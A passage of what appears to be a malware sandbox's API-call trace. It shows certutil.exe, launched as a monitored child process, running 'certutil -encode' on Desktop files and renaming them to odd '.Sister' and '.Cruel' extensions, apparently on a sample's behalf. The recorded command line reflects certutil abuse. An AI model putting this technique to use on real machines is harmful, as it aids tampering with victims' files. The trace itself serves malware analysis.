lpNumberOfCharsWritten=0x94a752e044*=0x14) returned 1 [0220.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.149] _vsnwprintf (in: _Buffer=0x94a752e090, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94a752f0e8 | out: _Buffer="\n") returned 1 [0220.149] GetFileType (hFile=0x50) returned 0x2 [0220.149] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e090*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94a752e044, lpReserved=0x0 | out: lpBuffer=0x94a752e090*, lpNumberOfCharsWritten=0x94a752e044*=0x1) returned 1 [0220.173] GetFileAttributesExW (in: lpFileName="AiNxYR.mp4.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\ainxyr.mp4.cruel"), fInfoLevelId=0x0, lpFileInformation=0x94a752f0a0 | out: lpFileInformation=0x94a752f0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd5dd4c, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xadd5dd4c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xadd78e04, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1a2e8)) returned 1 [0220.173] _vsnwprintf (in: _Buffer=0x94a752f0a8, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f098 | out: _Buffer="361") returned 3 [0220.173] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x94a752ee60, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0220.174] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x26d8f6d2ed0 [0220.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.174] _vsnwprintf (in: _Buffer=0x94a752e090, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x94a752f0e8 | out: _Buffer="Output Length = 107240") returned 22 [0220.174] GetFileType (hFile=0x50) returned 0x2 [0220.174] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e090*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x94a752e044, lpReserved=0x0 | out: lpBuffer=0x94a752e090*, lpNumberOfCharsWritten=0x94a752e044*=0x16) returned 1 [0220.175] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.175] _vsnwprintf (in: _Buffer=0x94a752e090, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94a752f0e8 | out: _Buffer="\n") returned 1 [0220.175] GetFileType (hFile=0x50) returned 0x2 [0220.176] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e090*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94a752e044, lpReserved=0x0 | out: lpBuffer=0x94a752e090*, lpNumberOfCharsWritten=0x94a752e044*=0x1) returned 1 [0220.180] LocalFree (hMem=0x26d8f6d3270) returned 0x0 [0220.180] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.180] _vsnwprintf (in: _Buffer=0x94a752f108, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f0f8 | out: _Buffer="2022") returned 4 [0220.180] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x94a752eec0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0220.180] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x26d8f6a88e0 [0220.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.180] _vsnwprintf (in: _Buffer=0x94a752e0f0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x94a752f148 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0220.180] GetFileType (hFile=0x50) returned 0x2 [0220.180] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e0f0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x94a752e0a4, lpReserved=0x0 | out: lpBuffer=0x94a752e0f0*, lpNumberOfCharsWritten=0x94a752e0a4*=0x31) returned 1 [0220.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.181] _vsnwprintf (in: _Buffer=0x94a752e0f0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x94a752f148 | out: _Buffer="\n") returned 1 [0220.181] GetFileType (hFile=0x50) returned 0x2 [0220.181] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x94a752e0f0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x94a752e0a4, lpReserved=0x0 | out: lpBuffer=0x94a752e0f0*, lpNumberOfCharsWritten=0x94a752e0a4*=0x1) returned 1 [0220.187] LocalFree (hMem=0x0) returned 0x0 [0220.187] LocalFree (hMem=0x26d8f6a9350) returned 0x0 [0220.187] LocalFree (hMem=0x26d8f6a8520) returned 0x0 [0220.187] SetLastError (dwErrCode=0x80070716) [0220.187] _vsnwprintf (in: _Buffer=0x94a752f178, _BufferCount=0xb, _Format="%d", _ArgList=0x94a752f168 | out: _Buffer="511") returned 3 [0220.187] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x94a752ef30, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0220.187] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26d8f6d2c90 [0220.187] PostQuitMessage (nExitCode=0) [0220.187] GetMessageW (in: lpMsg=0x94a752f770, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x94a752f770) returned 0 [0220.188] LocalFree (hMem=0x26d8f6bb630) returned 0x0 [0220.188] LocalFree (hMem=0x26d8f6d2e10) returned 0x0 [0220.188] LocalFree (hMem=0x0) returned 0x0 [0220.188] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0220.188] GetLastError () returned 0x7e [0220.189] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.189] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0220.189] DllMain () returned 0x1 [0220.189] LocalFree (hMem=0x26d8f6bb770) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6abb30) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6d2d50) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6d2ed0) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6a88e0) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6d2c90) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6c4c30) returned 0x0 [0220.189] LocalFree (hMem=0x26d8f6ab740) returned 0x0 [0220.189] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0220.189] GetLastError () returned 0x7e [0220.189] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.189] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0220.190] DllMain () returned 0x1 [0220.190] exit (_Code=0) Thread: id = 45 os_tid = 0xc18 Process: id = "14" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0xa9d6000" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x58 [0220.557] GetStartupInfoW (in: lpStartupInfo=0x48f4c7fd50 | out: lpStartupInfo=0x48f4c7fd50*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.562] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0220.562] __set_app_type (_Type=0x1) [0220.563] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0220.563] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0220.565] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0220.566] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0220.566] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0220.566] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0220.566] WerSetFlags () returned 0x0 [0220.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.567] __iob_func () returned 0x7ffcea2dea00 [0220.567] _fileno (_File=0x7ffcea2dea30) returned 1 [0220.567] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0220.567] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0220.568] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0220.568] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0220.568] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0220.569] GetConsoleOutputCP () returned 0x1b5 [0220.569] _vsnwprintf (in: _Buffer=0x48f4c7fcc0, _BufferCount=0xb, _Format=".%d", _ArgList=0x48f4c7fbe8 | out: _Buffer=".437") returned 4 [0220.570] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0220.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.570] GetFileType (hFile=0x50) returned 0x2 [0220.570] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0220.570] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0220.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.571] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0220.571] GetCommandLineW () returned="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"" [0220.571] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c07597b370 [0220.571] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c07596c740 [0220.571] LocalFree (hMem=0x1c07597b370) returned 0x0 [0220.571] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c075968ac0 [0220.571] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1c07596d220 [0220.571] LocalFree (hMem=0x1c075968ac0) returned 0x0 [0220.571] LocalFree (hMem=0x1c07596c740) returned 0x0 [0220.571] LocalFree (hMem=0x0) returned 0x0 [0220.571] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.572] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.572] GetCommandLineW () returned="certutil -encode \"d_S3PO8QIc.gif.Sister\" \"d_S3PO8QIc.gif.Cruel\"" [0220.572] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1c07597b4f0 [0220.572] GetSystemTime (in: lpSystemTime=0x48f4c7f9b0 | out: lpSystemTime=0x48f4c7f9b0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x37, wMilliseconds=0x71)) [0220.572] SystemTimeToFileTime (in: lpSystemTime=0x48f4c7f9b0, lpFileTime=0x48f4c7f9a8 | out: lpFileTime=0x48f4c7f9a8) returned 1 [0220.572] FileTimeToLocalFileTime (in: lpFileTime=0x48f4c7f9a8, lpLocalFileTime=0x48f4c7f970 | out: lpLocalFileTime=0x48f4c7f970) returned 1 [0220.573] FileTimeToSystemTime (in: lpFileTime=0x48f4c7f970, lpSystemTime=0x48f4c7f6e0 | out: lpSystemTime=0x48f4c7f6e0) returned 1 [0220.573] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x48f4c7f6e0, lpFormat=0x0, lpDateStr=0x48f4c7f7f0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0220.573] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x48f4c7f6e0, lpFormat=0x0, lpTimeStr=0x48f4c7f6f0, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0220.573] _vsnwprintf (in: _Buffer=0x48f4c7f6fe, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x48f4c7f6c8 | out: _Buffer=" 55.113s") returned 8 [0220.573] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1c07597df20 [0220.573] SetLastError (dwErrCode=0x80070716) [0220.573] _vsnwprintf (in: _Buffer=0x48f4c7f778, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f768 | out: _Buffer="948") returned 3 [0220.573] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x48f4c7f530, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0220.573] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1c07597b650 [0220.573] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1c075971c80 [0220.573] LocalFree (hMem=0x1c07597df20) returned 0x0 [0220.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x48f4c7fa20 | out: lpSystemTimeAsFileTime=0x48f4c7fa20*(dwLowDateTime=0xae14bac0, dwHighDateTime=0x1d6141f)) [0220.574] GetLocalTime (in: lpSystemTime=0x48f4c7fa58 | out: lpSystemTime=0x48f4c7fa58*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x37, wMilliseconds=0x72)) [0220.574] SystemTimeToFileTime (in: lpSystemTime=0x48f4c7fa58, lpFileTime=0x48f4c7fa30 | out: lpFileTime=0x48f4c7fa30) returned 1 [0220.574] CompareFileTime (lpFileTime1=0x48f4c7fa30, lpFileTime2=0x48f4c7fa20) returned 1 [0220.574] _vsnwprintf (in: _Buffer=0x48f4c7fa68, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x48f4c7f9f8 | out: _Buffer="GMT + 2.00") returned 10 [0220.574] LocalFree (hMem=0x1c07597b4f0) returned 0x0 [0220.574] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffccc870000 [0220.574] FindResourceW (hModule=0x7ffccc870000, lpName=0x1, lpType=0x10) returned 0x7ffccc930090 [0220.574] LoadResource (hModule=0x7ffccc870000, hResInfo=0x7ffccc930090) returned 0x7ffccc9300b0 [0220.574] LockResource (hResData=0x7ffccc9300b0) returned 0x7ffccc9300b0 [0220.574] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0220.574] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x48f4c7fa98 | out: _Buffer="10.0.15063.447") returned 14 [0220.574] GetACP () returned 0x4e4 [0220.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.575] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c07597b570 [0220.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c07597b570, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.575] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c07597de20 [0220.575] _vsnwprintf (in: _Buffer=0x1c07597de20, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x48f4c7fae8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.575] LocalFree (hMem=0x1c07597b570) returned 0x0 [0220.575] LocalFree (hMem=0x0) returned 0x0 [0220.575] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0220.575] GetACP () returned 0x4e4 [0220.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.575] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c07597b330 [0220.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c07597b330, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.575] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c07597e160 [0220.575] _vsnwprintf (in: _Buffer=0x1c07597e160, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x48f4c7fae8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.575] LocalFree (hMem=0x1c07597b330) returned 0x0 [0220.575] LocalFree (hMem=0x0) returned 0x0 [0220.575] GetACP () returned 0x4e4 [0220.575] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0220.576] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c07597b5b0 [0220.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1c07597b5b0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0220.576] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1c07597dde0 [0220.576] _vsnwprintf (in: _Buffer=0x1c07597dde0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x48f4c7fb18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0220.576] LocalFree (hMem=0x1c07597b5b0) returned 0x0 [0220.576] LocalFree (hMem=0x1c07597de20) returned 0x0 [0220.576] LocalFree (hMem=0x1c07597e160) returned 0x0 [0220.576] LocalFree (hMem=0x1c07597dde0) returned 0x0 [0220.576] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0220.576] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0220.576] GetStockObject (i=0) returned 0x900010 [0220.576] RegisterClassW (lpWndClass=0x48f4c7fc40) returned 0xc1a2 [0220.576] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1702be [0220.593] NtdllDefWindowProc_W () returned 0x0 [0220.594] NtdllDefWindowProc_W () returned 0x1 [0220.600] NtdllDefWindowProc_W () returned 0x0 [0220.610] UpdateWindow (hWnd=0x1702be) returned 1 [0220.610] PostMessageW (hWnd=0x1702be, Msg=0x400, wParam=0x0, lParam=0x1c07596217e) returned 1 [0220.610] GetMessageW (in: lpMsg=0x48f4c7fc90, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x48f4c7fc90) returned 1 [0220.610] TranslateMessage (lpMsg=0x48f4c7fc90) returned 0 [0220.610] DispatchMessageW (lpMsg=0x48f4c7fc90) returned 0x0 [0220.610] NtdllDefWindowProc_W () returned 0x0 [0220.610] GetMessageW (in: lpMsg=0x48f4c7fc90, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x48f4c7fc90) returned 1 [0220.610] TranslateMessage (lpMsg=0x48f4c7fc90) returned 0 [0220.610] DispatchMessageW (lpMsg=0x48f4c7fc90) returned 0x0 [0220.610] LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x1c07596aa70 [0220.610] LocalAlloc (uFlags=0x0, uBytes=0x7a) returned 0x1c075966470 [0220.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0220.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0220.611] SetLastError (dwErrCode=0x80070716) [0220.611] _vsnwprintf (in: _Buffer=0x48f4c7f698, _BufferCount=0xb, _Format="%d", _ArgList=0x48f4c7f688 | out: _Buffer="465") returned 3 [0220.611] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x48f4c7f450, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0220.611] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1c07596d1c0 [0220.611] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.611] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0220.611] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x48f4c7f430, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0220.611] GetLastError () returned 0xcb [0220.612] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.612] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.612] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.612] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.612] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.612] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.612] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.612] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.612] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.612] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.612] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.612] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.612] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.612] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.612] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0220.612] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0220.612] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0220.612] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0220.612] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0220.612] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0220.612] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0220.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x48f4c7f0f8 | out: phkResult=0x48f4c7f0f8*=0x23c) returned 0x0 [0220.613] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1c0759643f0 [0220.613] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x48f4c7f668, lpData=0x48f4c7f698, lpcbData=0x48f4c7f660*=0x4 | out: lpType=0x48f4c7f668*=0x0, lpData=0x48f4c7f698*=0x0, lpcbData=0x48f4c7f660*=0x4) returned 0x2 [0220.613] LocalFree (hMem=0x1c0759643f0) returned 0x0 [0220.613] RegCloseKey (hKey=0x23c) returned 0x0 [0220.613] LocalFree (hMem=0x0) returned 0x0 [0220.613] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1c07598c220 [0220.626] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0220.627] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0220.627] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0220.628] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1c0759899e0 [0220.628] GetComputerNameW (in: lpBuffer=0x1c0759899e0, nSize=0x48f4c7f660 | out: lpBuffer="NQDPDE", nSize=0x48f4c7f660) returned 1 [0220.628] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x48f4c7f630 | out: lpBuffer=0x0, nSize=0x48f4c7f630) returned 0 [0220.629] GetLastError () returned 0xea [0220.629] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1c07597b470 [0220.629] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1c07597b470, nSize=0x48f4c7f630 | out: lpBuffer="NQdPdE", nSize=0x48f4c7f630) returned 1 [0220.629] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0220.632] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1c075990b50, cbCertEncoded=0x7af5) returned 0x0 [0220.635] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1c075990b50, cbCrlEncoded=0x7af5) returned 0x0 [0220.635] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1c075990b50, cbEncoded=0x7af5, dwFlags=0x8000, pDecodePara=0x48f4c7f510, pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594 | out: pvStructInfo=0x48f4c7f5a0, pcbStructInfo=0x48f4c7f594) 